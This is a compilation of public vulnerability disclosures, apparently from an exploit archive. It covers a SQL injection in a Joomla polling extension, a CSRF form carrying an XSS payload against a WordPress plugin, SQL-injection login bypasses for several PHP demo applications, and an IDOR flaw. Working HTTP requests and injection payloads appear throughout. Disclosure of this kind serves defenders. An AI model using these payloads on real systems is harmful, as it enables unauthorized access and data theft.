Joomla SexyPolling version 2.1.7 suffers from a remote SQL injection vulnerability.

# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi  
# Google Dork: intext:"Powered by Sexy Polling"  
# Date: 2022-02-08  
# Exploit Author: Wolfgang Hotwagner  
# Vendor Homepage: https://2glux.com/projects/sexypolling  
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip  
# Version: all versions below version 2.1.8  
# Tested on: Debian Bullseye

SexyPolling SQL Injection

====================

| Identifier: | AIT-SA-20220208-01|  
| Target: | Sexy Polling ( Joomla Extension) |  
| Vendor: | 2glux |  
| Version: | all versions below version 2.1.8 |  
| CVE: | Not yet |  
| Accessibility: | Remote |  
| Severity: | Critical |  
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

Summary

========

[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.

Vulnerability Description

====================

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.

In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:

```  
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';  
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';  
```

These are later used unfiltered by the WHERE clause:

```  
$query_toal = "SELECT  
COUNT(sv.`id_answer`) total_count,  
MAX(sv.`date`) max_date,  
MIN(sv.`date`) min_date  
FROM  
`#__sexy_votes` sv  
JOIN  
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'  
AND  
sa.published = '1'  
WHERE  
sv.`id_answer` = sa.id";

//if dates are sent, add them to query  
if ($min_date_sended != '' && $max_date_sended != '')  
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";  
```

Proof Of Concept

==============

To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.

HTTP-Request:  
```  
POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
HTTP_X_REAL_IP: 1.1.1.1  
Content-Length: 193  
Origin: joomla-server.local  
Connection: close  
Referer: joomla-server.local/index.php/component/search/  
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1  
```

The HTTP-Resoonse contains a mysql error:

```  
HTTP/1.1 500 Internal Server Error  
Date: Wed, 15 Dec 2021 10:27:40 GMT  
Server: Apache/2.4.41 (Ubuntu)  
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-cache  
Pragma: no-cache  
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/  
Content-Length: 4768  
Connection: close  
Content-Type: application/json

<!DOCTYPE html>  
<html lang="en-gb" dir="ltr">  
<head>  
<meta charset="utf-8" />  
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title>  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />  
```

Vulnerable Versions  
================  
All versions below version 2.1.8

Tested Versions  
=============  
Sexy Polling ( Joomla Extension) 2.1.7

Impact  
======  
An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation  
=========  
Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline  
====================  
| 2021-12-14 | Unable to find a contact of the vendor |  
| 2021-12-15 | Contacting Joomla Security Strike Team |  
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |  
| 2022-01-01 | Sexy Polling releases 2.1.8 |  
| 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*

Advisory URL  
===========  
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)

Joomla SexyPolling 2.1.7 SQL Injection

WordPress Blue Admin plugin version 21.06.01 suffers from a cross site request forgery vulnerability.

    Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)Date: 2021-07-27Exploit Author : Abisheik M Vendor Homepage : https://wpscan.com/plugin/blue-admiVersion : <= 21.06.01Tested on: windows 10 ProfessionalCVE : CVE-2021-24581<html>  <body>    <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">      <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />      <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />      <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />      <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />      <input type="hidden" name="ba_lp_attr[logo_img]" value="" />      <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />      <input type="hidden" name="ba_lp_attr[text_color]" value="222222" />      <input type="hidden" name="ba_lp_attr[bg_img]" value="" />      <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />      <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />      <input type="hidden" name="ba_lp_options_save" value="Save changes" />      <input type="submit" value="Submit request" />    </form>  </body></html>

WordPress Blue Admin 21.06.01 Cross Site Request Forgery

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
    # Date: 2021-09-30
    # Exploit Author: sanjay singh
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step 4 – Change the username to admin' or '1'='1  and password to dfsms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC
    
    POST /dfsms/index.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 57
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dfsms/index.php
    Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
    Upgrade-Insecure-Requests: 1
    
    username=admin%27+or+%271%27%3D%271&password=dfsms&login=

CVE-2022-29007: Offensive Security’s Exploit Database Archive

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication.

    # Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - SQL Injection Authentication Bypass
    # Date: 29-09-2021
    # Exploit Author: sudoninja
    # Vendor Homepage: https://phpgurukul.com
    # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
    # Version: 1.0
    # Tested on: XAMPP / Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/ccms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step4 – Change the username to ' OR 1 -- -  and password to ccms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC 
    
    POST /ccms/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/ccms/
    Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
    Upgrade-Insecure-Requests: 1
    
    username='%20OR%201%20--%20-&password=ccms&login=

CVE-2022-29009: Offensive Security’s Exploit Database Archive

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.

    # Exploit Title: Directory Management System  1.0 - SQL Injection Authentication Bypass
    # Date: 2021-10-01
    # Exploit Author: SUDONINJA
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step 4 – Change the username to admin' or '1'='1  and password to dfsms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC
    
    POST /dms/admin/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 83
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dms/admin/
    Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
    Upgrade-Insecure-Requests: 1
    
    username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login

CVE-2022-29006: Offensive Security’s Exploit Database Archive

An insecure direct object reference (IDOR) vulnerability in the viewid parameter of Bus Pass Management System v1.0 allows attackers to access sensitive information.

    # Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
    # Date: 2021-09-05
    # Exploit Author: sudoninja
    # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
    # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
    # Version: 1.0
    # Tested on: Windows 10 - XAMPP Server
    
    # Vulnerable page :
    
    http://localhost/buspassms/admin/view-pass-detail.php?viewid=4
    
    # Vulnerable paramater :
    
    The viewid paramater is Vulnerable to Insecure direct object references (IDOR)
    
    # Proof Of Concept :
    
    # 1 . Download And install [ bus-pass-management-system ]
    # 2 . Go to /admin/index.php and Enter Username & Password 
    # 3 . Navigate to search >> search pass
    # 4 . Click on the view and enter the change viewid into the Url
    
    Use :
    http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]

Tag

#php